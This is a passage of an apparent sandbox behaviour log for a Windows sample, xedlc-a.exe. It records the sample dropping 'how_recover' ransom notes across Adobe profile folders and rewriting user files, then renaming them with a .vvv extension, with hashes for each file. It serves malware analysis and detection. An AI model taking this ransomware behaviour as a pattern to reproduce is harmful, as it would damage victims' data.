47169.          timestamp: 67479
47170.          mode: created
47171.          sequenceNumber: 777
47172.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\how_recover+utm.html
47173.          processinfo:
47174.            pid: 1056
47175.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47176.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47177.            ads:
47178.          fid (ads:): 281474976778212
47179.          ntstatus: 0x0
47180.          CreateOptions: 0x60
47181.        file:
47182.          timestamp: 67486
47183.          mode: close
47184.          sequenceNumber: 778
47185.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\7.0\how_recover+utm.html
47186.          filesize: 9495
47187.          md5sum: 95f596a25dff51b6af2042b1bbe02985
47188.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
47189.          processinfo:
47190.            pid: 1056
47191.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47192.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47193.            ads:
47194.          fid (ads:): 281474976778212
47195.          ntstatus: 0x0
47196.          CreateOptions: 0x0
47197.        file:
47198.          timestamp: 67513
47199.          mode: created
47200.          sequenceNumber: 779
47201.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Collab\how_recover+utm.txt
47202.          processinfo:
47203.            pid: 1056
47204.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47205.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47206.            ads:
47207.          fid (ads:): 281474976778213
47208.          ntstatus: 0x0
47209.          CreateOptions: 0x60
47210.        file:
47211.          timestamp: 67520
47212.          mode: close
47213.          sequenceNumber: 780
47214.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Collab\how_recover+utm.txt
47215.          filesize: 2682
47216.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
47217.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
47218.          processinfo:
47219.            pid: 1056
47220.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47221.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47222.            ads:
47223.          fid (ads:): 281474976778213
47224.          ntstatus: 0x0
47225.          CreateOptions: 0x0
47226.        file:
47227.          timestamp: 67528
47228.          mode: created
47229.          sequenceNumber: 781
47230.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Collab\how_recover+utm.html
47231.          processinfo:
47232.            pid: 1056
47233.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47234.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47235.            ads:
47236.          fid (ads:): 281474976778214
47237.          ntstatus: 0x0
47238.          CreateOptions: 0x60
47239.        file:
47240.          timestamp: 67536
47241.          mode: close
47242.          sequenceNumber: 782
47243.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Collab\how_recover+utm.html
47244.          filesize: 9495
47245.          md5sum: 95f596a25dff51b6af2042b1bbe02985
47246.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
47247.          processinfo:
47248.            pid: 1056
47249.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47250.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47251.            ads:
47252.          fid (ads:): 281474976778214
47253.          ntstatus: 0x0
47254.          CreateOptions: 0x0
47255.        file:
47256.          timestamp: 67632
47257.          mode: created
47258.          sequenceNumber: 783
47259.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Preferences\how_recover+utm.txt
47260.          processinfo:
47261.            pid: 1056
47262.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47263.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47264.            ads:
47265.          fid (ads:): 281474976778215
47266.          ntstatus: 0x0
47267.          CreateOptions: 0x60
47268.        file:
47269.          timestamp: 67639
47270.          mode: close
47271.          sequenceNumber: 784
47272.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Preferences\how_recover+utm.txt
47273.          filesize: 2682
47274.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
47275.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
47276.          processinfo:
47277.            pid: 1056
47278.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47279.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47280.            ads:
47281.          fid (ads:): 281474976778215
47282.          ntstatus: 0x0
47283.          CreateOptions: 0x0
47284.        file:
47285.          timestamp: 67745
47286.          mode: created
47287.          sequenceNumber: 785
47288.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Preferences\how_recover+utm.html
47289.          processinfo:
47290.            pid: 1056
47291.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47292.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47293.            ads:
47294.          fid (ads:): 281474976778216
47295.          ntstatus: 0x0
47296.          CreateOptions: 0x60
47297.        file:
47298.          timestamp: 67778
47299.          mode: close
47300.          sequenceNumber: 786
47301.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Preferences\how_recover+utm.html
47302.          filesize: 9495
47303.          md5sum: 95f596a25dff51b6af2042b1bbe02985
47304.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
47305.          processinfo:
47306.            pid: 1056
47307.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47308.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47309.            ads:
47310.          fid (ads:): 281474976778216
47311.          ntstatus: 0x0
47312.          CreateOptions: 0x0
47313.        file:
47314.          timestamp: 67802
47315.          mode: open
47316.          sequenceNumber: 787
47317.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\TMGrpPrm.sav
47318.          filesize: 566
47319.          processinfo:
47320.            pid: 1056
47321.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47322.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47323.            ads:
47324.          fid (ads:): 562949953480938
47325.          ntstatus: 0x0
47326.          CreateOptions: 0x60
47327.        apicall:
47328.          timestamp: 67815
47329.          repeat: 50
47330.          sequenceNumber: 788
47331.          processinfo:
47332.            pid: 1056
47333.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47334.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47335.          dllname: kernel32.dll
47336.          apiname: Sleep
47337.          address: 0x0041ed5b
47338.        file:
47339.          timestamp: 68023
47340.          mode: close
47341.          sequenceNumber: 789
47342.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\TMGrpPrm.sav
47343.          filesize: 990
47344.          md5sum: 9e34bc93256def5cfb3e477a242b77c4
47345.          sha1sum: 9da3067f653a0cee7ff399e67b6041b2d5e21e0f
47346.          processinfo:
47347.            pid: 1056
47348.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47349.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47350.            ads:
47351.          fid (ads:): 562949953480938
47352.          ntstatus: 0x0
47353.          CreateOptions: 0x0
47354.        file:
47355.          timestamp: 68033
47356.          mode: rename
47357.          sequenceNumber: 790
47358.          filesize: 990
47359.          md5sum: 9e34bc93256def5cfb3e477a242b77c4
47360.          sha1sum: 9da3067f653a0cee7ff399e67b6041b2d5e21e0f
47361.          processinfo:
47362.            pid: 1056
47363.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47364.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47365.          old_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\TMGrpPrm.sav
47366.          new_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\TMGrpPrm.sav.vvv
47367.            ads:
47368.          fid (ads:): 562949953480938
47369.          ntstatus: 0x0
47370.          CreateOptions: 0x0
47371.        file:
47372.          timestamp: 68060
47373.          mode: created
47374.          sequenceNumber: 791
47375.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\how_recover+utm.txt
47376.          processinfo:
47377.            pid: 1056
47378.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47379.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47380.            ads:
47381.          fid (ads:): 281474976778217
47382.          ntstatus: 0x0
47383.          CreateOptions: 0x60
47384.        file:
47385.          timestamp: 68067
47386.          mode: close
47387.          sequenceNumber: 792
47388.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\how_recover+utm.txt
47389.          filesize: 2682
47390.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
47391.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
47392.          processinfo:
47393.            pid: 1056
47394.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47395.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47396.            ads:
47397.          fid (ads:): 281474976778217
47398.          ntstatus: 0x0
47399.          CreateOptions: 0x0
47400.        file:
47401.          timestamp: 68073
47402.          mode: created
47403.          sequenceNumber: 793
47404.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\how_recover+utm.html
47405.          processinfo:
47406.            pid: 1056
47407.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47408.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47409.            ads:
47410.          fid (ads:): 281474976778218
47411.          ntstatus: 0x0
47412.          CreateOptions: 0x60
47413.        file:
47414.          timestamp: 68079
47415.          mode: close
47416.          sequenceNumber: 794
47417.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\how_recover+utm.html
47418.          filesize: 9495
47419.          md5sum: 95f596a25dff51b6af2042b1bbe02985
47420.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
47421.          processinfo:
47422.            pid: 1056
47423.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47424.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47425.            ads:
47426.          fid (ads:): 281474976778218
47427.          ntstatus: 0x0
47428.          CreateOptions: 0x0
47429.        file:
47430.          timestamp: 68088
47431.          mode: created
47432.          sequenceNumber: 795
47433.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\Collab\how_recover+utm.txt
47434.          processinfo:
47435.            pid: 1056
47436.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47437.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47438.            ads:
47439.          fid (ads:): 281474976778219
47440.          ntstatus: 0x0
47441.          CreateOptions: 0x60
47442.        file:
47443.          timestamp: 68094
47444.          mode: close
47445.          sequenceNumber: 796
47446.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\Collab\how_recover+utm.txt
47447.          filesize: 2682
47448.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
47449.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
47450.          processinfo:
47451.            pid: 1056
47452.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47453.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47454.            ads:
47455.          fid (ads:): 281474976778219
47456.          ntstatus: 0x0
47457.          CreateOptions: 0x0
47458.        file:
47459.          timestamp: 68121
47460.          mode: created
47461.          sequenceNumber: 797
47462.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\Collab\how_recover+utm.html
47463.          processinfo:
47464.            pid: 1056
47465.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47466.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47467.            ads:
47468.          fid (ads:): 281474976778220
47469.          ntstatus: 0x0
47470.          CreateOptions: 0x60
47471.        file:
47472.          timestamp: 68128
47473.          mode: close
47474.          sequenceNumber: 798
47475.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\Collab\how_recover+utm.html
47476.          filesize: 9495
47477.          md5sum: 95f596a25dff51b6af2042b1bbe02985
47478.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
47479.          processinfo:
47480.            pid: 1056
47481.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47482.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47483.            ads:
47484.          fid (ads:): 281474976778220
47485.          ntstatus: 0x0
47486.          CreateOptions: 0x0
47487.        file:
47488.          timestamp: 68136
47489.          mode: created
47490.          sequenceNumber: 799
47491.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\Forms\how_recover+utm.txt
47492.          processinfo:
47493.            pid: 1056
47494.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47495.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47496.            ads:
47497.          fid (ads:): 281474976778221
47498.          ntstatus: 0x0
47499.          CreateOptions: 0x60
47500.        file:
47501.          timestamp: 68142
47502.          mode: close
47503.          sequenceNumber: 800
47504.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\Forms\how_recover+utm.txt
47505.          filesize: 2682
47506.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
47507.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
47508.          processinfo:
47509.            pid: 1056
47510.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47511.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47512.            ads:
47513.          fid (ads:): 281474976778221
47514.          ntstatus: 0x0
47515.          CreateOptions: 0x0
47516.        file:
47517.          timestamp: 68149
47518.          mode: created
47519.          sequenceNumber: 801
47520.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\Forms\how_recover+utm.html
47521.          processinfo:
47522.            pid: 1056
47523.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47524.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47525.            ads:
47526.          fid (ads:): 281474976778222
47527.          ntstatus: 0x0
47528.          CreateOptions: 0x60
47529.        file:
47530.          timestamp: 68154
47531.          mode: close
47532.          sequenceNumber: 802
47533.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\Forms\how_recover+utm.html
47534.          filesize: 9495
47535.          md5sum: 95f596a25dff51b6af2042b1bbe02985
47536.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
47537.          processinfo:
47538.            pid: 1056
47539.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47540.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47541.            ads:
47542.          fid (ads:): 281474976778222
47543.          ntstatus: 0x0
47544.          CreateOptions: 0x0
47545.        file:
47546.          timestamp: 68194
47547.          mode: created
47548.          sequenceNumber: 803
47549.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\Preferences\how_recover+utm.txt
47550.          processinfo:
47551.            pid: 1056
47552.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47553.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47554.            ads:
47555.          fid (ads:): 281474976778223
47556.          ntstatus: 0x0
47557.          CreateOptions: 0x60
47558.        file:
47559.          timestamp: 68212
47560.          mode: close
47561.          sequenceNumber: 804
47562.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\Preferences\how_recover+utm.txt
47563.          filesize: 2682
47564.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
47565.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
47566.          processinfo:
47567.            pid: 1056
47568.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47569.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47570.            ads:
47571.          fid (ads:): 281474976778223
47572.          ntstatus: 0x0
47573.          CreateOptions: 0x0
47574.        file:
47575.          timestamp: 68231
47576.          mode: created
47577.          sequenceNumber: 805
47578.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\Preferences\how_recover+utm.html
47579.          processinfo:
47580.            pid: 1056
47581.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47582.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47583.            ads:
47584.          fid (ads:): 281474976778224
47585.          ntstatus: 0x0
47586.          CreateOptions: 0x60
47587.        file:
47588.          timestamp: 68237
47589.          mode: close
47590.          sequenceNumber: 806
47591.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\Preferences\how_recover+utm.html
47592.          filesize: 9495
47593.          md5sum: 95f596a25dff51b6af2042b1bbe02985
47594.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
47595.          processinfo:
47596.            pid: 1056
47597.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47598.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47599.            ads:
47600.          fid (ads:): 281474976778224
47601.          ntstatus: 0x0
47602.          CreateOptions: 0x0
47603.        file:
47604.          timestamp: 68245
47605.          mode: open
47606.          sequenceNumber: 807
47607.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\TMDocs.sav
47608.          filesize: 36
47609.          processinfo:
47610.            pid: 1056
47611.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47612.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47613.            ads:
47614.          fid (ads:): 281474976775758
47615.          ntstatus: 0x0
47616.          CreateOptions: 0x60
47617.        file:
47618.          timestamp: 68260
47619.          mode: close
47620.          sequenceNumber: 808
47621.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\TMDocs.sav
47622.          filesize: 462
47623.          md5sum: d3cb40fe6344099bc36a0a405f266e88
47624.          sha1sum: 2d3009264bd44c228fe35e6e9e85433840ded9cf
47625.          processinfo:
47626.            pid: 1056
47627.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47628.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47629.            ads:
47630.          fid (ads:): 281474976775758
47631.          ntstatus: 0x0
47632.          CreateOptions: 0x0
47633.        file:
47634.          timestamp: 68270
47635.          mode: rename
47636.          sequenceNumber: 809
47637.          filesize: 462
47638.          md5sum: d3cb40fe6344099bc36a0a405f266e88
47639.          sha1sum: 2d3009264bd44c228fe35e6e9e85433840ded9cf
47640.          processinfo:
47641.            pid: 1056
47642.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47643.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47644.          old_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\TMDocs.sav
47645.          new_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\TMDocs.sav.vvv
47646.            ads:
47647.          fid (ads:): 281474976775758
47648.          ntstatus: 0x0
47649.          CreateOptions: 0x0
47650.        file:
47651.          timestamp: 68279
47652.          mode: open
47653.          sequenceNumber: 810
47654.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\TMGrpPrm.sav
47655.          filesize: 690
47656.          processinfo:
47657.            pid: 1056
47658.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47659.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47660.            ads:
47661.          fid (ads:): 281474976775757
47662.          ntstatus: 0x0
47663.          CreateOptions: 0x60
47664.        file:
47665.          timestamp: 68342
47666.          mode: close
47667.          sequenceNumber: 811
47668.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\TMGrpPrm.sav
47669.          filesize: 1118
47670.          md5sum: 72fa1df4bfa30cb18008f32b4178655e
47671.          sha1sum: 509bb591ca63ec997964287a45bbf1c6a5516e3e
47672.          processinfo:
47673.            pid: 1056
47674.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47675.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47676.            ads:
47677.          fid (ads:): 281474976775757
47678.          ntstatus: 0x0
47679.          CreateOptions: 0x0
47680.        file:
47681.          timestamp: 68352
47682.          mode: rename
47683.          sequenceNumber: 812
47684.          filesize: 1118
47685.          md5sum: 72fa1df4bfa30cb18008f32b4178655e
47686.          sha1sum: 509bb591ca63ec997964287a45bbf1c6a5516e3e
47687.          processinfo:
47688.            pid: 1056
47689.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47690.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47691.          old_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\TMGrpPrm.sav
47692.          new_name: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\TMGrpPrm.sav.vvv
47693.            ads:
47694.          fid (ads:): 281474976775757
47695.          ntstatus: 0x0
47696.          CreateOptions: 0x0
47697.        file:
47698.          timestamp: 68360
47699.          mode: created
47700.          sequenceNumber: 813
47701.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\how_recover+utm.txt
47702.          processinfo:
47703.            pid: 1056
47704.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47705.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47706.            ads:
47707.          fid (ads:): 281474976778225
47708.          ntstatus: 0x0
47709.          CreateOptions: 0x60
47710.        file:
47711.          timestamp: 68366
47712.          mode: close
47713.          sequenceNumber: 814
47714.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\how_recover+utm.txt
47715.          filesize: 2682
47716.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
47717.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
47718.          processinfo:
47719.            pid: 1056
47720.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47721.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47722.            ads:
47723.          fid (ads:): 281474976778225
47724.          ntstatus: 0x0
47725.          CreateOptions: 0x0
47726.        file:
47727.          timestamp: 68372
47728.          mode: created
47729.          sequenceNumber: 815
47730.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\how_recover+utm.html
47731.          processinfo:
47732.            pid: 1056
47733.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47734.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47735.            ads:
47736.          fid (ads:): 281474976778226
47737.          ntstatus: 0x0
47738.          CreateOptions: 0x60
47739.        file:
47740.          timestamp: 68378
47741.          mode: close
47742.          sequenceNumber: 816
47743.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\9.0\how_recover+utm.html
47744.          filesize: 9495
47745.          md5sum: 95f596a25dff51b6af2042b1bbe02985
47746.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
47747.          processinfo:
47748.            pid: 1056
47749.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47750.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47751.            ads:
47752.          fid (ads:): 281474976778226
47753.          ntstatus: 0x0
47754.          CreateOptions: 0x0
47755.        file:
47756.          timestamp: 68607
47757.          mode: created
47758.          sequenceNumber: 817
47759.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\how_recover+utm.txt
47760.          processinfo:
47761.            pid: 1056
47762.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47763.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47764.            ads:
47765.          fid (ads:): 281474976778227
47766.          ntstatus: 0x0
47767.          CreateOptions: 0x60
47768.        file:
47769.          timestamp: 68613
47770.          mode: close
47771.          sequenceNumber: 818
47772.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\how_recover+utm.txt
47773.          filesize: 2682
47774.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
47775.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
47776.          processinfo:
47777.            pid: 1056
47778.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47779.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47780.            ads:
47781.          fid (ads:): 281474976778227
47782.          ntstatus: 0x0
47783.          CreateOptions: 0x0
47784.        file:
47785.          timestamp: 69022
47786.          mode: created
47787.          sequenceNumber: 819
47788.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\how_recover+utm.html
47789.          processinfo:
47790.            pid: 1056
47791.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47792.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47793.            ads:
47794.          fid (ads:): 281474976778228
47795.          ntstatus: 0x0
47796.          CreateOptions: 0x60
47797.        file:
47798.          timestamp: 69063
47799.          mode: close
47800.          sequenceNumber: 820
47801.          value: C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\how_recover+utm.html
47802.          filesize: 9495
47803.          md5sum: 95f596a25dff51b6af2042b1bbe02985
47804.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
47805.          processinfo:
47806.            pid: 1056
47807.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47808.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47809.            ads:
47810.          fid (ads:): 281474976778228
47811.          ntstatus: 0x0
47812.          CreateOptions: 0x0
47813.        file:
47814.          timestamp: 69073
47815.          mode: created
47816.          sequenceNumber: 821
47817.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\how_recover+utm.txt
47818.          processinfo:
47819.            pid: 1056
47820.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47821.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47822.            ads:
47823.          fid (ads:): 281474976778229
47824.          ntstatus: 0x0
47825.          CreateOptions: 0x60
47826.        file:
47827.          timestamp: 69079
47828.          mode: close
47829.          sequenceNumber: 822
47830.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\how_recover+utm.txt
47831.          filesize: 2682
47832.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
47833.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
47834.          processinfo:
47835.            pid: 1056
47836.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47837.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47838.            ads:
47839.          fid (ads:): 281474976778229
47840.          ntstatus: 0x0
47841.          CreateOptions: 0x0
47842.        file:
47843.          timestamp: 69087
47844.          mode: created
47845.          sequenceNumber: 823
47846.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\how_recover+utm.html
47847.          processinfo:
47848.            pid: 1056
47849.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47850.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47851.            ads:
47852.          fid (ads:): 281474976778230
47853.          ntstatus: 0x0
47854.          CreateOptions: 0x60
47855.        file:
47856.          timestamp: 69113
47857.          mode: close
47858.          sequenceNumber: 824
47859.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\how_recover+utm.html
47860.          filesize: 9495
47861.          md5sum: 95f596a25dff51b6af2042b1bbe02985
47862.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
47863.          processinfo:
47864.            pid: 1056
47865.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47866.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47867.            ads:
47868.          fid (ads:): 281474976778230
47869.          ntstatus: 0x0
47870.          CreateOptions: 0x0
47871.        file:
47872.          timestamp: 69121
47873.          mode: created
47874.          sequenceNumber: 825
47875.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\how_recover+utm.txt
47876.          processinfo:
47877.            pid: 1056
47878.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47879.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47880.            ads:
47881.          fid (ads:): 281474976778231
47882.          ntstatus: 0x0
47883.          CreateOptions: 0x60
47884.        file:
47885.          timestamp: 69129
47886.          mode: close
47887.          sequenceNumber: 826
47888.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\how_recover+utm.txt
47889.          filesize: 2682
47890.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
47891.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
47892.          processinfo:
47893.            pid: 1056
47894.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47895.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47896.            ads:
47897.          fid (ads:): 281474976778231
47898.          ntstatus: 0x0
47899.          CreateOptions: 0x0
47900.        file:
47901.          timestamp: 69153
47902.          mode: created
47903.          sequenceNumber: 827
47904.          value: C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\how_recover+utm.html
47905.          processinfo:
47906.            pid: 1056
47907.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
47908.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
47909.            ads:
47910.          fid (ads:): 281474976778232
47911.          ntstatus: 0x0
47912.          CreateOptions: 0x60
47913.        file:
47914.          timestamp: 69160
47915.          mode: close
